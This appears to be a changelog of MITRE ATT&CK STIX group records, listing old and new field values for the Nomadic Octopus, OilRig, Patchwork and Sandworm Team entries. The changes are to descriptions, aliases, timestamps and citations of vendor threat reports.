| description | [Nomadic Octopus](https://attack.mitre.org/groups/G0133) is a Russian-speaking cyberespionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://attack.mitre.org/groups/G0133) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018) | [Nomadic Octopus](https://attack.mitre.org/groups/G0133) is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://attack.mitre.org/groups/G0133) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018) |
| external_references[1]['source_name'] | Nomadic Octopus | DustSquad |
| external_references[1]['description'] | (Citation: SecurityWeek Nomadic Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018) | (Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: SecurityWeek Nomadic Octopus Oct 2018) |
| external_references[2]['source_name'] | DustSquad | Nomadic Octopus |
| external_references[2]['description'] | (Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: SecurityWeek Nomadic Octopus Oct 2018) | (Citation: SecurityWeek Nomadic Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018) |
| external_references[3]['source_name'] | Security Affairs DustSquad Oct 2018 | ESET Nomadic Octopus 2018 |
| external_references[3]['description'] | Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021. | Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021. |
| external_references[3]['url'] | https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html | https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf |
| external_references[5]['source_name'] | ESET Nomadic Octopus 2018 | SecurityWeek Nomadic Octopus Oct 2018 |
| external_references[5]['description'] | Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021. | Kovacs, E. (2018, October 18). Russia-Linked Hackers Target Diplomatic Entities in Central Asia. Retrieved October 13, 2021. |
| external_references[5]['url'] | https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf | https://www.securityweek.com/russia-linked-hackers-target-diplomatic-entities-central-asia |
| external_references[6]['source_name'] | SecurityWeek Nomadic Octopus Oct 2018 | Security Affairs DustSquad Oct 2018 |
| external_references[6]['description'] | Kovacs, E. (2018, October 18). Russia-Linked Hackers Target Diplomatic Entities in Central Asia. Retrieved October 13, 2021. | Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021. |
| external_references[6]['url'] | https://www.securityweek.com/russia-linked-hackers-target-diplomatic-entities-central-asia | https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html |
| Old Description | New Description |
|---|---|
| [OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018) | [OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/ |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/ |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 22:04:08.941000+00:00 | 2022-06-02 20:18:52.733000+00:00 |
| description | [OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018) | [OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018) |
| aliases[3] | HELIX KITTEN | APT34 |
| aliases[4] | APT34 | Helix Kitten |
| external_references[1]['source_name'] | OilRig | IRN2 |
| external_references[1]['description'] | (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: Unit 42 QUADAGENT July 2018) | (Citation: Crowdstrike Helix Kitten Nov 2018) |
| external_references[2]['source_name'] | COBALT GYPSY | OilRig |
| external_references[2]['description'] | (Citation: Secureworks COBALT GYPSY Threat Profile) | (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: Unit 42 QUADAGENT July 2018) |
| external_references[3]['source_name'] | IRN2 | COBALT GYPSY |
| external_references[3]['description'] | (Citation: Crowdstrike Helix Kitten Nov 2018) | (Citation: Secureworks COBALT GYPSY Threat Profile) |
| external_references[4]['source_name'] | HELIX KITTEN | Helix Kitten |
| external_references[5]['source_name'] | APT34 | Check Point APT34 April 2021 |
| external_references[5]['description'] | This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity. (Citation: Unit 42 QUADAGENT July 2018) (Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021) | Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021. |
| external_references[6]['source_name'] | Palo Alto OilRig April 2017 | ClearSky OilRig Jan 2017 |
| external_references[6]['description'] | Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017. | ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017. |
| external_references[6]['url'] | http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/ | http://www.clearskysec.com/oilrig/ |
| external_references[7]['source_name'] | ClearSky OilRig Jan 2017 | Palo Alto OilRig May 2016 |
| external_references[7]['description'] | ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017. | Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017. |
| external_references[7]['url'] | http://www.clearskysec.com/oilrig/ | http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/ |
| external_references[8]['source_name'] | Palo Alto OilRig May 2016 | Palo Alto OilRig April 2017 |
| external_references[8]['description'] | Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017. | Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017. |
| external_references[8]['url'] | http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/ | http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/ |
| external_references[10]['source_name'] | Unit 42 Playbook Dec 2017 | Unit 42 QUADAGENT July 2018 |
| external_references[10]['description'] | Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017. | Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018. |
| external_references[10]['url'] | https://pan-unit42.github.io/playbook_viewer/ | https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/ |
| external_references[11]['source_name'] | FireEye APT34 Dec 2017 | Crowdstrike Helix Kitten Nov 2018 |
| external_references[11]['description'] | Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017. | Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018. |
| external_references[11]['url'] | https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/ |
| external_references[12]['source_name'] | Unit 42 QUADAGENT July 2018 | FireEye APT34 Dec 2017 |
| external_references[12]['description'] | Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018. | Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017. |
| external_references[12]['url'] | https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/ | https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html |
| external_references[14]['source_name'] | Crowdstrike Helix Kitten Nov 2018 | APT34 |
| external_references[14]['description'] | Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018. | This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity. (Citation: Unit 42 QUADAGENT July 2018) (Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021) |
| external_references[15]['source_name'] | Check Point APT34 April 2021 | Unit 42 Playbook Dec 2017 |
| external_references[15]['description'] | Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021. | Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017. |
| external_references[15]['url'] | https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/ | https://pan-unit42.github.io/playbook_viewer/ |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Dragos Threat Intelligence |
| Old Description | New Description |
|---|---|
| [Patchwork](https://attack.mitre.org/groups/G0040) is a cyberespionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018. (Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork) (Citation: TrendMicro Patchwork Dec 2017) (Citation: Volexity Patchwork June 2018) | [Patchwork](https://attack.mitre.org/groups/G0040) is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | https://web.archive.org/web/20180825085952/https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf | |
| external_references | http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf | |
| external_references | https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-02 21:07:07.755000+00:00 | 2022-09-02 18:04:32.246000+00:00 |
| description | [Patchwork](https://attack.mitre.org/groups/G0040) is a cyberespionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018. (Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork) (Citation: TrendMicro Patchwork Dec 2017) (Citation: Volexity Patchwork June 2018) | [Patchwork](https://attack.mitre.org/groups/G0040) is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018) |
| external_references[2]['source_name'] | Hangover Group | Chinastrats |
| external_references[2]['description'] | Patchwork and the Hangover Group have both been referenced as aliases for the threat group associated with Operation Monsoon.(Citation: PaloAlto Patchwork Mar 2018)(Citation: Unit 42 BackConfig May 2020)(Citation: Forcepoint Monsoon) | (Citation: Securelist Dropping Elephant) |
| external_references[4]['source_name'] | Chinastrats | Hangover Group |
| external_references[4]['description'] | (Citation: Securelist Dropping Elephant) | [Patchwork](https://attack.mitre.org/groups/G0040) and the Hangover Group have both been referenced as aliases for the threat group associated with Operation Monsoon.(Citation: PaloAlto Patchwork Mar 2018)(Citation: Unit 42 BackConfig May 2020)(Citation: Forcepoint Monsoon) |
| external_references[5]['source_name'] | MONSOON | Cymmetria Patchwork |
| external_references[5]['description'] | MONSOON is the name of an espionage campaign; we use it here to refer to the actor group behind the campaign. (Citation: Forcepoint Monsoon) (Citation: PaloAlto Patchwork Mar 2018) | Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016. |
| external_references[6]['source_name'] | Operation Hangover | Operation Hangover May 2013 |
| external_references[6]['description'] | It is believed that the actors behind Patchwork are the same actors behind Operation Hangover. (Citation: Forcepoint Monsoon) (Citation: Operation Hangover May 2013) | Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved September 26, 2016. |
| external_references[7]['source_name'] | Cymmetria Patchwork | Symantec Patchwork |
| external_references[7]['description'] | Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016. | Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016. |
| external_references[7]['url'] | https://web.archive.org/web/20180825085952/https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf | http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries |
| external_references[8]['source_name'] | Symantec Patchwork | Unit 42 BackConfig May 2020 |
| external_references[8]['description'] | Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016. | Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020. |
| external_references[8]['url'] | http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries | https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/ |
| external_references[9]['source_name'] | TrendMicro Patchwork Dec 2017 | Operation Hangover |
| external_references[9]['description'] | Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018. | It is believed that the actors behind [Patchwork](https://attack.mitre.org/groups/G0040) are the same actors behind Operation Hangover. (Citation: Forcepoint Monsoon) (Citation: Operation Hangover May 2013) |
| external_references[10]['source_name'] | Volexity Patchwork June 2018 | Securelist Dropping Elephant |
| external_references[10]['description'] | Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018. | Kaspersky Lab's Global Research & Analysis Team. (2016, July 8). The Dropping Elephant – aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016. |
| external_references[10]['url'] | https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/ | https://securelist.com/the-dropping-elephant-actor/75328/ |
| external_references[11]['source_name'] | Securelist Dropping Elephant | PaloAlto Patchwork Mar 2018 |
| external_references[11]['description'] | Kaspersky Lab's Global Research & Analysis Team. (2016, July 8). The Dropping Elephant – aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016. | Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018. |
| external_references[11]['url'] | https://securelist.com/the-dropping-elephant-actor/75328/ | https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/ |
| external_references[12]['source_name'] | PaloAlto Patchwork Mar 2018 | TrendMicro Patchwork Dec 2017 |
| external_references[12]['description'] | Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018. | Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018. |
| external_references[12]['url'] | https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/ | https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf |
| external_references[13]['source_name'] | Unit 42 BackConfig May 2020 | Volexity Patchwork June 2018 |
| external_references[13]['description'] | Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020. | Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018. |
| external_references[13]['url'] | https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/ | https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/ |
| external_references[14]['source_name'] | Forcepoint Monsoon | MONSOON |
| external_references[14]['description'] | Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016. | MONSOON is the name of an espionage campaign; we use it here to refer to the actor group behind the campaign. (Citation: Forcepoint Monsoon) (Citation: PaloAlto Patchwork Mar 2018) |
| external_references[15]['source_name'] | Operation Hangover May 2013 | Forcepoint Monsoon |
| external_references[15]['description'] | Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved September 26, 2016. | Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016. |
| external_references[15]['url'] | http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf | https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf |
| Description |
|---|
| [Sandworm Team](https://attack.mitre.org/groups/G0034) is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) This group has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020) In October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://attack.mitre.org/groups/G0034) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://attack.mitre.org/software/S0368) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://attack.mitre.org/software/S0365) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28](https://attack.mitre.org/groups/G0007).(Citation: US District Court Indictment GRU Oct 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Dragos Threat Intelligence'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack', 'mobile-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 21:46:19.437000+00:00 | 2022-10-12 20:11:40.313000+00:00 |
| aliases[6] | VOODOO BEAR | Voodoo Bear |
| external_references[1]['source_name'] | Sandworm Team | Voodoo Bear |
| external_references[1]['description'] | (Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) | (Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) |
| external_references[3]['source_name'] | Telebots | Sandworm Team |
| external_references[3]['description'] | (Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) | (Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) |
| external_references[4]['source_name'] | IRON VIKING | Quedagh |
| external_references[4]['description'] | (Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) | (Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020) |
| external_references[6]['source_name'] | Quedagh | Telebots |
| external_references[6]['description'] | (Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020) | (Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) |
| external_references[7]['source_name'] | VOODOO BEAR | IRON VIKING |
| external_references[7]['description'] | (Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) | (Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) |
| external_references[8]['source_name'] | US District Court Indictment GRU Unit 74455 October 2020 | US District Court Indictment GRU Oct 2018 |
| external_references[8]['description'] | Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020. | Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020. |
| external_references[8]['url'] | https://www.justice.gov/opa/press-release/file/1328521/download | https://www.justice.gov/opa/page/file/1098481/download |
| external_references[9]['source_name'] | UK NCSC Olympic Attacks October 2020 | Dragos ELECTRUM |
| external_references[9]['description'] | UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020. | Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020. |
| external_references[9]['url'] | https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games | https://www.dragos.com/resource/electrum/ |
| external_references[10]['source_name'] | iSIGHT Sandworm 2014 | F-Secure BlackEnergy 2014 |
| external_references[10]['description'] | Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017. | F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016. |
| external_references[10]['url'] | https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html | https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf |
| external_references[11]['source_name'] | CrowdStrike VOODOO BEAR | iSIGHT Sandworm 2014 |
| external_references[11]['description'] | Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018. | Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017. |
| external_references[11]['url'] | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/ | https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html |
| external_references[12]['source_name'] | USDOJ Sandworm Feb 2020 | CrowdStrike VOODOO BEAR |
| external_references[12]['description'] | Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020. | Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018. |
| external_references[12]['url'] | https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/ |
| external_references[13]['source_name'] | NCSC Sandworm Feb 2020 | InfoSecurity Sandworm Oct 2014 |
| external_references[13]['description'] | NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020. | Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017. |
| external_references[13]['url'] | https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory | https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/ |
| external_references[14]['source_name'] | US District Court Indictment GRU Oct 2018 | NCSC Sandworm Feb 2020 |
| external_references[14]['description'] | Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020. | NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020. |
